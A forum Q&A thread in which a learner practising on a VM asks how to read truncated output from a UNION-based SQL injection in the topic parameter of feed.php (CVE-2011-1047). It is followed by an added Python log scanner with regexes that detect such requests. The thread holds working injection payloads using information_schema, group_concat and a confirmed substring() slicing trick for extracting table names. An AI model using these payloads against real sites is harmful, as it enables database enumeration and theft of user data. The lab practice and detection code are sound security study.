
This might seem like a noob question. I am currently trying SQL injection on a VM. This is what I am trying:

union select group_concat(table_name) from information_schema.tables#

And the injection works. But the page that is returned is an XML file and each tag has a size limitation, so I can see only half of the results.

<title>Bla Forum - Topic:  CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>

Is there a way to print the second half of the results? The table that I need to see contains the word "user". If I'm being too ambiguous, I want to do something along the lines of:

  1. Arrange the rows of the result and then group_concat it
  2. Slice the result (as in string[10:])
  3. Select all the rows after tables_priv

What I already tried:

union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#

Nothing is printed out. But this query works when I directly try it in the VM's MySQL (after omitting the 'union' and the '#').

union select group_concat(table_name) from information_schema.tables where table_name like 'user'#

Didn't work on either the web application or directly in the VM's MySQL.

PS. I know sqlmap will do the job for me, but I want to try things manually.

PPS. I am trying CVE-2011-1047 (topic parameter in feed.php)

1 Answer


There must be string manipulation routines or something in MySQL. Then you simply do a

union select substring(group_concat(table_name),1,10) from information_schema.tables#

or something like that and then you execute the query for each slice...

  • Thanks a lot. This actually worked. Been breaking my head on this for quite some time now. Didn't know there was a substring() function in MySQL. Commented Jan 12, 2017 at 20:54
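From the defender's side, the exchange above describes a recognisable pattern in web server access logs: the `topic` parameter of `feed.php` carrying `union select`, `information_schema`, `group_concat(` and, once the XML tag truncation is hit, repeated `substring(` slices of the same query. The following is an added example (not from the original post or the affected application) that parses constructed Apache-style log lines, URL-decodes the `topic` parameter and reports which of those indicators each request matches; the log lines, the `feed.php` path and the indicator names are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines; not taken from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2017:20:10:01 +0000] "GET /feed.php?topic=42 HTTP/1.1" 200 512
10.0.0.5 - - [12/Jan/2017:20:10:07 +0000] "GET /feed.php?topic=42%20union%20select%20group_concat(table_name)%20from%20information_schema.tables%23 HTTP/1.1" 200 2048
10.0.0.9 - - [12/Jan/2017:20:11:30 +0000] "GET /feed.php?topic=7 HTTP/1.1" 200 498
10.0.0.5 - - [12/Jan/2017:20:12:44 +0000] "GET /feed.php?topic=42%20union%20select%20substring(group_concat(table_name),1,10)%20from%20information_schema.tables%23 HTTP/1.1" 200 530
"""

# Common Log Format request line: client IP, timestamp, method, target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator mirrors one construct from the injected queries discussed above.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.{0,20}\bselect\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "substring_slice": re.compile(r"\bsubstring\s*\(", re.I),
    "comment_terminator": re.compile(r"(#|--\s|/\*)"),
}

def topic_param(target):
    """Return the URL-decoded 'topic' value of a feed.php request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/feed.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("topic")
    return values[0] if values else None

def score_request(target):
    """Return the names of all indicators matched by the decoded topic parameter."""
    topic = topic_param(target)
    if topic is None:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(topic)]

def scan_log(text):
    """Return (ip, timestamp, matched indicators, decoded topic) for suspicious lines."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        matched = score_request(m["target"])
        if matched:
            hits.append((m["ip"], m["ts"], matched, topic_param(m["target"])))
    return hits

if __name__ == "__main__":
    for ip, ts, matched, topic in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} topic={topic!r} indicators={matched}")
```

A burst of `substring_slice` hits from one client against the same endpoint is the log signature of the slice-by-slice reading the answer describes; the lasting fix is still to bind `topic` as a query parameter rather than interpolate it into SQL.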
